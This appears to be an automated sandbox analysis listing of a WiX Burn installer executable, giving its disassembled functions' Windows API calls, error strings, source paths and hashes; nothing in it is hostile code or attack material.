                                                                                                                                                                    • Part of subcall function 009205D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 00920603
                                                                                                                                                                    • Part of subcall function 009205D5: FreeLibrary.KERNEL32(00000000), ref: 0092061E
                                                                                                                                                                    • Part of subcall function 009205D5: GetLastError.KERNEL32 ref: 00920628
                                                                                                                                                                  • IsWindow.USER32(?), ref: 00917385
                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00917398
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917131
                                                                                                                                                                  • Failed to query registration., xrefs: 009171CB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                  • String ID: Failed to query registration.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 1565363025-1827799990
                                                                                                                                                                  • Opcode ID: a4e10b978be32d49dac9a124e2079ef4de816f1067c4ed9e22ef9b761c14fc36
                                                                                                                                                                  • Instruction ID: 9b3e2ed761a1cfd7c762e49c99c6888f110c7daf5a070259c35e1702ad0606d2
                                                                                                                                                                  • Opcode Fuzzy Hash: a4e10b978be32d49dac9a124e2079ef4de816f1067c4ed9e22ef9b761c14fc36
                                                                                                                                                                  • Instruction Fuzzy Hash: 65F0C231744609BADB0177A0DC0BFEEF678AF90701F104011B905A40A1D7B18BD5FA60
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009205D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 00920603
                                                                                                                                                                    • Part of subcall function 009205D5: FreeLibrary.KERNEL32(00000000), ref: 0092061E
                                                                                                                                                                    • Part of subcall function 009205D5: GetLastError.KERNEL32 ref: 00920628
                                                                                                                                                                  • IsWindow.USER32(?), ref: 00917385
                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00917398
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917131
                                                                                                                                                                  • Failed to check global conditions, xrefs: 0091716A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                  • String ID: Failed to check global conditions$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 1565363025-665746148
                                                                                                                                                                  • Opcode ID: 6d5e0922a739122e59c0f09396419970f29378ad10e38969d6f18582f8a37039
                                                                                                                                                                  • Instruction ID: 142a47125aa463b7e1e92aa0000f3e74352d97e33d5a78cca42839378c77a813
                                                                                                                                                                  • Opcode Fuzzy Hash: 6d5e0922a739122e59c0f09396419970f29378ad10e38969d6f18582f8a37039
                                                                                                                                                                  • Instruction Fuzzy Hash: 8EF0C231704209BADB0177A0DC4BFEEFA78AB90701F100011B905A40A2D7B58BD6FB60
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009205D5: GetProcAddress.KERNEL32(00000000,BundleExtensionDestroy), ref: 00920603
                                                                                                                                                                    • Part of subcall function 009205D5: FreeLibrary.KERNEL32(00000000), ref: 0092061E
                                                                                                                                                                    • Part of subcall function 009205D5: GetLastError.KERNEL32 ref: 00920628
                                                                                                                                                                  • IsWindow.USER32(?), ref: 00917385
                                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00917398
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\engine.cpp, xrefs: 00917131
                                                                                                                                                                  • Failed to open log., xrefs: 0091711F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressErrorFreeLastLibraryMessagePostProcWindow
                                                                                                                                                                  • String ID: Failed to open log.$d:\a\wix4\wix4\src\burn\engine\engine.cpp
                                                                                                                                                                  • API String ID: 1565363025-1747915094
                                                                                                                                                                  • Opcode ID: b3c365a4b7e3f58f5fc16f5dedb2c569cdd4b6ae80c37588ac3fa17e2f1e88f1
                                                                                                                                                                  • Instruction ID: 8c797804b7ecee0e961940df4518bb09ab5ebbe12b4f6d44a4bb0e115082106d
                                                                                                                                                                  • Opcode Fuzzy Hash: b3c365a4b7e3f58f5fc16f5dedb2c569cdd4b6ae80c37588ac3fa17e2f1e88f1
                                                                                                                                                                  • Instruction Fuzzy Hash: 5EF0C231740209BADB0177A0DC0AFEEB678AF94701F100011B505A40A1D7B19AD5EA60
                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00959A94,00000000,?,009ACD30,?,?,?,00959C37,00000004,InitializeCriticalSectionEx,0099C2FC,InitializeCriticalSectionEx), ref: 00959AF0
                                                                                                                                                                  • GetLastError.KERNEL32(?,00959A94,00000000,?,009ACD30,?,?,?,00959C37,00000004,InitializeCriticalSectionEx,0099C2FC,InitializeCriticalSectionEx,00000000,?,009599B0), ref: 00959AFA
                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00959B22
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                  • API String ID: 3177248105-2084034818
                                                                                                                                                                  • Opcode ID: 532d2fbbd2796b196d5716b61d541c30d8885de0803e59967f39f2a97992240c
                                                                                                                                                                  • Instruction ID: d70af85e3fe10dfee4bf02fbd641a6134f14dc9e44ec7fb77792ddca7e604089
                                                                                                                                                                  • Opcode Fuzzy Hash: 532d2fbbd2796b196d5716b61d541c30d8885de0803e59967f39f2a97992240c
                                                                                                                                                                  • Instruction Fuzzy Hash: 38E01A71684205BAFF205B62FC06B193A5CEB14B52F104060FD0DA80E1F762E9559A45
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetConsoleOutputCP.KERNEL32(A68EAB5A,00000000,00000000,?), ref: 00966618
                                                                                                                                                                    • Part of subcall function 00961F7B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0096628B,?,00000000,-00000008), ref: 00961FDC
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0096686A
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 009668B0
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00966953
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2112829910-0
                                                                                                                                                                  • Opcode ID: b7e0b05566395e30ccea3bf71897daa8ce450697f4d6382d7e4c75700d696bb9
                                                                                                                                                                  • Instruction ID: ce17dd722eb33c399e21e8b46d83449d97007bb0988d15ebd08c2ce6d6647c4f
                                                                                                                                                                  • Opcode Fuzzy Hash: b7e0b05566395e30ccea3bf71897daa8ce450697f4d6382d7e4c75700d696bb9
                                                                                                                                                                  • Instruction Fuzzy Hash: D3D1ACB5D042599FCF14CFA8D890AEDBBB8FF49314F24452AE866EB351D630A942CB50
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                  • Opcode ID: e0b8613dd19c1875432bebe9256f0800c980e740ff27ec616e74323757f7c35c
                                                                                                                                                                  • Instruction ID: a70b02ecffa31bf8d6210207e698806fb3a01f433f1be0819e2ba1dfedcbb4a0
                                                                                                                                                                  • Opcode Fuzzy Hash: e0b8613dd19c1875432bebe9256f0800c980e740ff27ec616e74323757f7c35c
                                                                                                                                                                  • Instruction Fuzzy Hash: 1C5138726096029FDB28CF67D841BBAB7A9FF45312F10462DEC054B290E735DC48CB9A
                                                                                                                                                                  APIs
                                                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000020,00000003,?,?,00000000), ref: 0091C932
                                                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,?,?,?,00000000), ref: 0091C93A
                                                                                                                                                                  • VerSetConditionMask.KERNEL32(00000000,?,?,?,?,00000000), ref: 0091C942
                                                                                                                                                                  • VerifyVersionInfoW.KERNEL32(0000011C,00000023,00000000), ref: 0091C96F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2793162063-0
                                                                                                                                                                  • Opcode ID: a987249ca0f220ccc3a33ccf73a5be22fd77485f1917d65d2ebc2692f8ac2941
                                                                                                                                                                  • Instruction ID: 8e426618d9141f05abc69a7e74e9095caa97527aa14f534f4c58d9da857418b3
                                                                                                                                                                  • Opcode Fuzzy Hash: a987249ca0f220ccc3a33ccf73a5be22fd77485f1917d65d2ebc2692f8ac2941
                                                                                                                                                                  • Instruction Fuzzy Hash: 91111F71D1422CAADB24DF55DC06BEEBBB8EF08B00F00809AB509A6281D6B44B848FD4
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(7FFFFFFE,00000000,?,?,009185B0,00000000,?,0092A80F,?,00000001,00000000,?,00000002,-00000001,00000008,?), ref: 0091B4FE
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(7FFFFFFE,7FFFFFFE,?,00000000,?,?,009185B0,00000000,?,0092A80F,?,00000001,00000000,?,00000002,-00000001), ref: 0091B55D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get visibility of variable: %ls, xrefs: 0091B52E
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 0091B540
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Failed to get visibility of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-1405185440
                                                                                                                                                                  • Opcode ID: 6776199fc0658c7a8ccc454311cf9fb79433fe50398eb4f15760000cd3ec9c3c
                                                                                                                                                                  • Instruction ID: 3004acc93012c8b3c364ebb537b6b1b83803457f8c3bc0f5b83d1e88396ecc7f
                                                                                                                                                                  • Opcode Fuzzy Hash: 6776199fc0658c7a8ccc454311cf9fb79433fe50398eb4f15760000cd3ec9c3c
                                                                                                                                                                  • Instruction Fuzzy Hash: FC018F7264021CFFDB029F44CC0AFDE3BAAEB08765F018050F9159B260D770AE909BA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00967E50,00000000,00000001,?,?,?,009669A7,?,00000000,00000000), ref: 00968CFE
                                                                                                                                                                  • GetLastError.KERNEL32(?,00967E50,00000000,00000001,?,?,?,009669A7,?,00000000,00000000,?,?,?,00966F4A,00000000), ref: 00968D0A
                                                                                                                                                                    • Part of subcall function 00968CD0: CloseHandle.KERNEL32(FFFFFFFE,00968D1A,?,00967E50,00000000,00000001,?,?,?,009669A7,?,00000000,00000000,?,?), ref: 00968CE0
                                                                                                                                                                  • ___initconout.LIBCMT ref: 00968D1A
                                                                                                                                                                    • Part of subcall function 00968C91: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00968CC0,00967E3D,?,?,009669A7,?,00000000,00000000,?), ref: 00968CA4
                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00967E50,00000000,00000001,?,?,?,009669A7,?,00000000,00000000,?), ref: 00968D2F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                                                  • Opcode ID: e73e45e20338e5aae389872a64fabcdcc197db53577335df21e3dc2f2123f132
                                                                                                                                                                  • Instruction ID: 9deb788b09801cc35a372b57230c17d64ebe714b84301031f25ca3e3af9ff302
                                                                                                                                                                  • Opcode Fuzzy Hash: e73e45e20338e5aae389872a64fabcdcc197db53577335df21e3dc2f2123f132
                                                                                                                                                                  • Instruction Fuzzy Hash: 20F03037015114BBCF226F95DC09A8A3F6AFF4A7A1F004551FE5C95170DB32C960EBA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 009169E9
                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,00000000), ref: 00916A06
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00916A10
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 00916A17
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterErrorEventLastLeave
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2851136515-0
                                                                                                                                                                  • Opcode ID: 873dd6729b1dfd297c9ee12384f15687927d09406fce847d73184cc85a135285
                                                                                                                                                                  • Instruction ID: 4349019a8bbae667190b99ebe703e368bd84acb6622ed6ef6dbc5beee177c964
                                                                                                                                                                  • Opcode Fuzzy Hash: 873dd6729b1dfd297c9ee12384f15687927d09406fce847d73184cc85a135285
                                                                                                                                                                  • Instruction Fuzzy Hash: 08E09237314519A7CB116FA5EC08ECA7BBCEF8D761B008021F619D2131DB30E585DBA0
                                                                                                                                                                  APIs
                                                                                                                                                                  • EncodePointer.KERNEL32(00000000,?), ref: 0095A63B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EncodePointer
                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                                                                                  • Opcode ID: 7e53eee64a25c284ed01050533e71d7852a0c364bbbf997d91fb4113c4354345
                                                                                                                                                                  • Instruction ID: 5351f3d3b4f1ec90ccb1ea60630fe785fc05d9d7fa3639c34edac6cd68970bd2
                                                                                                                                                                  • Opcode Fuzzy Hash: 7e53eee64a25c284ed01050533e71d7852a0c364bbbf997d91fb4113c4354345
                                                                                                                                                                  • Instruction Fuzzy Hash: D9417831900209EFCF15DF99CC81AAEBBB9BF48305F198298FD0467221D335A954DB56
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy variant value., xrefs: 0093D988
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variant.cpp, xrefs: 0093D99A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                  • String ID: Failed to copy variant value.$d:\a\wix4\wix4\src\burn\engine\variant.cpp
                                                                                                                                                                  • API String ID: 2001391462-3907457943
                                                                                                                                                                  • Opcode ID: c4b3ecbc6b96df6c8beda29722a7fdae79278bb4d9f0a741c5a7214c9c27a02e
                                                                                                                                                                  • Instruction ID: f9fd99734b52fdba4ea54e88552bece7bdb21739de3083cc9a064bc3cc8628c9
                                                                                                                                                                  • Opcode Fuzzy Hash: c4b3ecbc6b96df6c8beda29722a7fdae79278bb4d9f0a741c5a7214c9c27a02e
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F212972D03219BAD721EEACECA5FBEF66CEB46710F140926F510A7140D2749D40CEA2
APIs
• CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,00916DEA,00000000,00917162,00000000,00000257,54B7FF10), ref: 00948132
Strings
• Failed to add chained patch., xrefs: 00948176
• d:\a\wix4\wix4\src\burn\engine\mspengine.cpp, xrefs: 00948188
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID: CompareString
• String ID: Failed to add chained patch.$d:\a\wix4\wix4\src\burn\engine\mspengine.cpp
• API String ID: 1825529933-1868150798
• Opcode ID: c890666f29cf680bf632d62f97995bc898e0397198de474d0067c1cc7fc6aa24
• Instruction ID: a50064646b49984afa78b8622b8689b11340a25ef4de0a07c12093e95a7168e5
• Opcode Fuzzy Hash: c890666f29cf680bf632d62f97995bc898e0397198de474d0067c1cc7fc6aa24
• Instruction Fuzzy Hash: 2F317F71A04219EFDB04CF58CC85EEEB7B9FF49314F20865AE914A7391D770A941DB90
Strings
• d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\memutil.cpp, xrefs: 00915641
• Failed to resize array while inserting items, xrefs: 00915632
Memory Dump Source
• Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
• Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
Similarity
• API ID:
• String ID: Failed to resize array while inserting items$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\memutil.cpp
• API String ID: 0-1811546269
• Opcode ID: 4359c97938f14a7ab299a9dbeb8770dca7cb3900e2f5e0c8b84911aab7d47041
• Instruction ID: b933e772514bf4f0ab9344ae7c299dbbf2360c8d60baa9f533daabed5a73a1ac
• Opcode Fuzzy Hash: 4359c97938f14a7ab299a9dbeb8770dca7cb3900e2f5e0c8b84911aab7d47041
• Instruction Fuzzy Hash: 7821A171B00619EFCF04EE58CD86EEFBB69EFD4754F564025E805AB351D270A9408BE0
APIs
